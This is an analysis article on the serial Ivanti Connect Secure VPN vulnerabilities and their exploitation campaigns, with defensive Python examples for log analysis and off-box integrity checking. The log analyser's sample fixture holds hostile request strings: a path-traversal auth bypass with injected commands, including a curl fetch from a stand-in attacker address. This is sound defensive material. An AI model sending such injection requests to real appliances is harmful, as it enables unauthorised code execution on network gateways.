# Ivanti Connect Secure Serial Vulnerabilities

Analysis of sustained exploitation campaigns targeting Ivanti Connect Secure VPN appliances.
Ivanti Connect Secure (formerly Pulse Secure) VPN appliances occupy a privileged network position: they sit at the perimeter, authenticate remote users, and broker access to internal infrastructure. That concentration of trust makes them a high-value target. Between late 2023 and early 2025, a series of critical vulnerabilities in Ivanti Connect Secure created sequential exploitation opportunities that nation-state actors and criminal groups exploited faster than most organizations could patch. The result was one of the most sustained, widespread VPN compromise campaigns in recent memory, affecting government agencies, defense contractors, financial institutions, and critical infrastructure operators across dozens of countries. Understanding the vulnerability chain, the attacker techniques, and the required response is essential for any security program that depends on perimeter VPN for remote access.
---
The "Ivanti Connect Secure serial vulnerabilities" refers to a sequence of distinct but related security flaws discovered in Ivanti Connect Secure and, in some cases, Ivanti Policy Secure appliances between 2023 and 2025. The term "serial" is deliberate: these were not a single flaw disclosed once. They were successive vulnerabilities in the same product family, each enabling unauthenticated remote code execution (RCE) or equivalent impact, and each arriving in close enough sequence that organizations patching one flaw often remained exposed to the next before remediation was complete.
The four primary CVEs in this chain are: CVE-2023-46805 (authentication bypass, CVSS 8.2), CVE-2024-21887 (command injection, CVSS 9.1), CVE-2024-21893 (server-side request forgery, CVSS 8.2), and CVE-2025-0282 (stack-based buffer overflow, CVSS 9.0). When chained, the first two allowed a remote, unauthenticated attacker to execute arbitrary commands on the appliance. The third bypassed the interim mitigation Ivanti had shipped for the first two before a full patch was available. The fourth opened a new exploitation vector on devices that had applied every prior patch.
This topic is distinct from general VPN security weaknesses or misconfiguration issues. It is also distinct from the Pulse Connect Secure vulnerabilities disclosed in 2021 (CVE-2021-22893), though those share architectural lineage. The 2023 to 2025 chain is notable specifically because: the vulnerabilities arrived faster than the vendor's patch cadence; the Integrity Checker Tool (ICT) embedded in the appliance was itself subverted by threat actors; and factory resets were ultimately required rather than incremental patching.
This is not a problem of weak passwords, misconfigured access controls, or missing MFA. It is a problem of exploitable flaws in the appliance's core authentication and request-handling logic that no customer-side configuration change could prevent.
---
## Authentication Bypass and Command Injection (CVE-2023-46805 and CVE-2024-21887)
The first exploitation vector combined two separate flaws into a single, powerful attack chain. CVE-2023-46805 allowed an unauthenticated attacker to bypass the web component's authentication checks by manipulating specific URI paths in the Connect Secure web interface. Certain paths were not consistently validated against the authentication middleware, meaning an attacker could reach protected endpoints without presenting valid credentials.
CVE-2024-21887 was a command injection vulnerability in the same web interface. When authenticated (or, after chaining with the auth bypass, effectively unauthenticated), an attacker could send crafted HTTP requests to administrative endpoints and inject operating system commands that would execute in the context of the appliance's underlying system. Together, these two CVEs gave a remote attacker unauthenticated RCE on any internet-facing Connect Secure appliance.
Exploitation was not theoretical. Ivanti disclosed both CVEs on January 10, 2024, and Volexity published the same day its analysis of in-the-wild exploitation by the actor it tracked as UTA0178 (UNC5221 in Mandiant's naming), which had been deploying webshells and credential-harvesting implants since at least early December 2023. Mandiant's follow-on reporting documented victims in the United States, Japan, and Europe, and mass exploitation by additional actors began within days of the disclosure. Exploitation weeks before public disclosure indicates prior access to vulnerability information, through either independent research or intelligence acquisition.
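The first telemetry check a practitioner would want for this chain, as an added example (not Ivanti's, Volexity's, Mandiant's or CDA's code): a small log analyser that flags the two request shapes the two flaws produce, a dot-dot path whose normalised target differs from the raw string (the bypass) and shell metacharacters inside a path (the injection), and reports which source addresses did both. The log lines are constructed for the example; the `/api/v1/totp/user-backup-code/../../` prefix in them mirrors the publicly reported January 2024 request shape, but the checks are generic and do not depend on that exact path. The same logic serves the "anomalous URI patterns" monitoring the TID methodology section asks for.

```python
"""Flag web-log lines consistent with the CVE-2023-46805 / CVE-2024-21887 chain.

Added example, not vendor or CDA code. Log format and IP addresses are
constructed; the traversal prefix is the publicly reported 2024 request shape
and is illustrative only (the detector does not key on it).
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in a common-log-style format (not real appliance logs).
SAMPLE_LOG = """\
203.0.113.10 - - [11/Jan/2024:08:14:02 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 4123
203.0.113.10 - - [11/Jan/2024:08:14:09 +0000] "POST /dana-na/auth/url_default/login.cgi HTTP/1.1" 302 0
198.51.100.7 - - [11/Jan/2024:08:15:31 +0000] "GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1" 200 1877
198.51.100.7 - - [11/Jan/2024:08:15:40 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/;id HTTP/1.1" 200 219
198.51.100.7 - - [11/Jan/2024:08:15:55 +0000] "GET /api/v1/totp/user-backup-code/..%2f..%2flicense/keys-status/%3bcurl%20http%3a%2f%2f198.51.100.7%2fx HTTP/1.1" 200 219
203.0.113.22 - - [11/Jan/2024:08:16:03 +0000] "GET /api/v1/configuration/users/user-roles HTTP/1.1" 401 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Characters that never belong in a legitimate REST path segment.
SHELL_META = re.compile(r"[;|`]|\$\(")


def classify_uri(uri):
    """Return a set of tags describing why a request URI looks hostile."""
    path = unquote(uri.split("?", 1)[0])  # decode once, drop the query string
    tags = set()
    normalized = posixpath.normpath(path)
    if ".." in path.split("/") and normalized != path:
        # Dot-dot segments that change the effective target: the classic
        # "authorise the raw string, route the normalised one" mismatch.
        tags.add("traversal")
    if SHELL_META.search(path):
        tags.add("shell-meta")
    return tags


def analyze(log_text):
    """Parse log lines; return (src, effective_path, tags) for suspicious ones."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_uri(m["uri"])
        if tags:
            path = unquote(m["uri"].split("?", 1)[0])
            findings.append((m["src"], posixpath.normpath(path), tags))
    return findings


def chained_sources(findings):
    """Sources that both traversed and injected: the full RCE chain, not mere probing."""
    seen = {}
    for src, _path, tags in findings:
        seen.setdefault(src, set()).update(tags)
    return {src for src, tags in seen.items() if {"traversal", "shell-meta"} <= tags}


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for src, path, tags in found:
        print(f"{src:15} {sorted(tags)} {path}")
    print("chained:", chained_sources(found))
```

Two design points: the URI is decoded exactly once before inspection, so percent-encoded `..%2f` and `%3b` are caught without the analyser itself becoming a double-decoding bug, and the traversal test looks at whether normalisation changes the target rather than at a fixed string, so a variant that reaches a different protected endpoint through the same mismatch is still flagged.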
## Server-Side Request Forgery Bypass (CVE-2024-21893)
When Ivanti published its interim mitigation for the first two CVEs, UNC5325 (assessed as a Chinese state-sponsored actor) adapted. CVE-2024-21893 was a server-side request forgery (SSRF) vulnerability in the SAML component of Connect Secure. An unauthenticated attacker could cause the appliance to make server-side requests to restricted internal endpoints, reaching the same protected functionality the mitigation had closed off at the front door and chaining once more into the CVE-2024-21887 command injection. Organizations that had applied only the interim mitigation, rather than the full patch Ivanti released on January 31, 2024, therefore remained exposed through a second path. Ivanti reported targeted exploitation of the SSRF at the time of its January 31, 2024 disclosure, and mass exploitation followed within days, before many organizations could apply the patch.
## Stack Buffer Overflow (CVE-2025-0282)
The third major wave involved CVE-2025-0282, a stack-based buffer overflow in the same product line. An unauthenticated remote attacker could achieve code execution by sending a crafted request that overflowed a stack buffer in the appliance's web server process. The flaw was exploited in the wild before Ivanti disclosed it on January 8, 2025, again indicating pre-patch exploitation by well-resourced actors; Mandiant attributed the activity to UNC5337, which it assessed as part of the UNC5221 cluster. CISA added the CVE to its Known Exploited Vulnerabilities catalog on the day of disclosure and published mitigation instructions directing that compromised appliances be factory reset before returning to service. The federal emergency directive requiring civilian agencies to disconnect affected appliances and complete a compromise assessment before reconnecting was Emergency Directive 24-01, issued during the January 2024 wave and expanded on January 31, 2024 to mandate disconnection.
## Post-Exploitation Mechanics
Once attackers achieved RCE, the post-exploitation pattern was consistent across documented intrusions. Attackers deployed webshells (BUSHWALK, LIGHTWIRE, and WIREFIRE were the primary families identified by Mandiant) into writable directories on the appliance. These webshells persisted across reboots and survived the standard in-place patch process because they were written to portions of the file system not overwritten by the patch installer.
Attackers then modified legitimate Ivanti components to establish deeper persistence. In several documented cases, attackers tampered with the on-appliance ICT so that it would report a clean state even when the appliance was compromised. This is a critical detail: organizations that ran the built-in ICT after applying patches received false assurance, because the tool they trusted was executing on the very system it was meant to verify. Detecting the modifications required an integrity check run from a separate, trusted system (the external ICT, or an independent comparison against a known-good baseline) or forensic analysis of a disk image.
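An added example (not Ivanti's ICT and not CDA tooling) of the independent integrity verification this paragraph and the TID methodology section argue for: snapshot a file tree into a SHA-256 manifest, keep that manifest off the appliance, and diff a later snapshot against it from a separate system. The directory layout and file contents are a constructed toy, not the real appliance filesystem; the scenario modelled is the one described above, a webshell dropped into a writable directory, the built-in checker patched to always pass, and a legitimate handler trojaned.

```python
"""Off-box file-integrity baseline and diff.

Added example, not vendor or CDA code. The tree built in demo() is a toy;
directory names are illustrative and do not reflect the real appliance layout.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each regular file under root (as a relative POSIX path) to its SHA-256.

    Symlinks are recorded by target rather than followed, so a planted link
    cannot point the hasher at an unmodified file and hide a swapped one.
    """
    manifest = {}
    root = Path(root)
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        if path.is_symlink():
            manifest[rel] = "symlink:" + os.readlink(path)
        elif path.is_file():
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 16), b""):
                    h.update(chunk)
            manifest[rel] = h.hexdigest()
    return manifest


def diff(baseline, current):
    """Classify every path as added, removed or modified relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Build a toy appliance tree, baseline it, simulate the intrusion, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "www" / "cgi").mkdir(parents=True)
        (root / "data" / "tmp").mkdir(parents=True)
        (root / "bin" / "integrity_check").write_bytes(b"#!/bin/sh\nexit 0\n")
        (root / "www" / "cgi" / "login.cgi").write_bytes(b"legit handler\n")

        # Serialise the baseline and treat the serialised copy as the one held
        # off the appliance: the comparison below uses only that copy, which
        # an attacker on the box never had write access to.
        stored_off_box = json.dumps(snapshot(root))

        # Simulated post-exploitation (constructed): webshell in a writable
        # directory, checker patched to always report clean, handler trojaned.
        (root / "data" / "tmp" / "cache.cgi").write_bytes(b"webshell\n")
        (root / "bin" / "integrity_check").write_bytes(
            b"#!/bin/sh\necho clean; exit 0\n")
        (root / "www" / "cgi" / "login.cgi").write_bytes(
            b"legit handler + credential tap\n")

        return diff(json.loads(stored_off_box), snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9} {paths}")
```

The point the code makes is that the checker's own binary is just another file in the manifest: a tampered on-box ICT shows up as `modified` because the baseline it is compared against was never on the box for the attacker to edit. In practice the baseline is taken from a freshly installed image of the exact firmware version and the comparison runs on an analyst workstation against a mounted disk image, not on the appliance.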
From the compromised VPN appliance, attackers conducted credential harvesting (capturing credentials submitted by legitimate users), internal network pivoting through the appliance's privileged network position, and lateral movement into Active Directory and downstream systems.
## Attack Timeline and TTPs
The sophistication of the exploitation campaign extended beyond the vulnerabilities themselves. Threat actors demonstrated detailed operational security: they rotated command-and-control infrastructure frequently, used legitimate cloud services for data staging, and deployed different webshell families to complicate attribution and detection. UNC5221 specifically targeted government and defense contractors, while Magnet Goblin, a financially motivated actor, focused on commercial targets.
The timing of exploitation relative to disclosure reveals pre-positioned access to vulnerability information. CVE-2023-46805 and CVE-2024-21887 were actively exploited in December 2023 but not publicly disclosed until January 2024. The pattern repeated with each subsequent vulnerability: exploitation began before, or within hours of, public disclosure, compressing the window for defensive response to essentially zero.
## Scenario: Defense Contractor Compromise
A defense contractor running Ivanti Connect Secure for remote access had applied the initial January 2024 patches within the vendor's recommended window. Their ICT scan reported no indicators of compromise. However, the contractor had been compromised before the patch was applied, and the webshells survived patching. Over the following six weeks, the threat actor used the appliance's network position to enumerate internal hosts, extract Active Directory credentials, and access a file server containing sensitive program documentation. The compromise was not detected until a third-party threat intelligence provider flagged outbound connections to known UNC5221 command-and-control infrastructure.
---
VPN appliances are among the most trusted devices on any network. They sit between the public internet and internal infrastructure, they process authentication credentials for every remote user, and they typically have broad network access to support diverse remote use cases. A compromised VPN appliance is not a compromised endpoint: it is a compromised network gateway with visibility into all traffic passing through it.
The Ivanti Connect Secure campaign produced documented consequences across multiple sectors. CISA confirmed that multiple U.S. federal civilian agencies were compromised. The New Zealand National Cyber Security Centre, the UK National Cyber Security Centre, and German federal authorities all issued advisories confirming incidents in their jurisdictions. Mandiant estimated that hundreds of organizations globally were affected in the initial January 2024 exploitation wave alone.
The business impact extended beyond immediate incident response costs. Organizations faced several weeks of VPN outage while conducting factory resets and full compromise assessments. For organizations where VPN was the primary remote access mechanism, this represented significant operational disruption. Some organizations discovered that the compromise had persisted for weeks or months before detection, requiring extensive forensic investigation to determine the scope of data exposure.
The financial impact was amplified by disclosure in early January, immediately after the year-end holiday period, when many organizations were still running with reduced IT and security staffing while supporting peak remote-work demand. Emergency response, external forensic support, and business continuity measures drove incident response costs into the hundreds of thousands of dollars per affected organization. Government agencies faced additional compliance obligations under federal incident reporting requirements.
A common misconception in the initial response was that applying the vendor patch was sufficient. Many security teams, following standard patch management procedures, applied the patch, ran the ICT, received a clean result, and considered the issue resolved. This was incorrect for organizations that had been compromised before patching. The ICT tampering by threat actors specifically targeted this assumption. The correct response, which CISA and Ivanti eventually made explicit, was factory reset followed by an independent compromise assessment, regardless of ICT results.
A second misconception was that the vulnerabilities primarily affected government targets. Magnet Goblin, a financially motivated threat actor, was documented exploiting the same vulnerability chain against commercial targets for ransomware deployment and financial fraud. The attack surface was any internet-facing Ivanti Connect Secure appliance, regardless of the owner's sector.
---
CDA approaches the Ivanti Connect Secure serial vulnerabilities through two primary domains of the Planetary Defense Model: Threat Intelligence and Detection (TID) and Vulnerability and Surface Defense (VSD). The governing methodology is Predictive Defense Intelligence (PDI): see the threat before it sees you.
The practical application of PDI to this threat class begins with the recognition that serial vulnerabilities in internet-facing appliances follow a pattern. When a critical vulnerability is disclosed in a widely deployed perimeter device, exploitation by sophisticated actors typically begins within 24 to 72 hours. In the Ivanti case, exploitation began before public disclosure, meaning that organizations relying on patch release as their detection trigger had already lost the race. PDI requires moving the detection point earlier: monitoring threat intelligence feeds, vendor security advisories, and government early-warning channels to identify exploitation activity before CVEs are publicly assigned.
CDA's TID methodology applies continuous monitoring of internet-facing appliance telemetry as a first-order priority, not a secondary consideration. For Ivanti Connect Secure specifically, this means: collecting and analyzing appliance web server logs for anomalous URI patterns consistent with auth bypass attempts; monitoring for unexpected outbound connections from the appliance; and maintaining baselines of legitimate file system state against which to compare periodic integrity snapshots. The compromise of the built-in ICT in this campaign is a direct example of why CDA does not rely on vendor-supplied integrity verification alone. Independent verification from a separate, non-appliance-resident tool is a standard PDI control.
On the VSD side, CDA treats internet-facing VPN appliances as high-priority attack surface requiring dedicated monitoring and a pre-defined response playbook. The Ivanti campaign reinforced the CDA recommendation to evaluate Zero Trust Network Access (ZTNA) architectures as a structural alternative to traditional VPN, not because VPN is inherently broken, but because ZTNA architectures distribute trust rather than concentrating it in a single appliance. A compromised ZTNA broker does not provide the same lateral movement potential as a compromised traditional VPN gateway.
CDA also emphasizes that incident response planning for internet-facing appliances must include factory reset and full internal compromise assessment as explicit scenarios, with pre-approved authorization chains to minimize delay when the scenario activates.
---
Written by CDA Editorial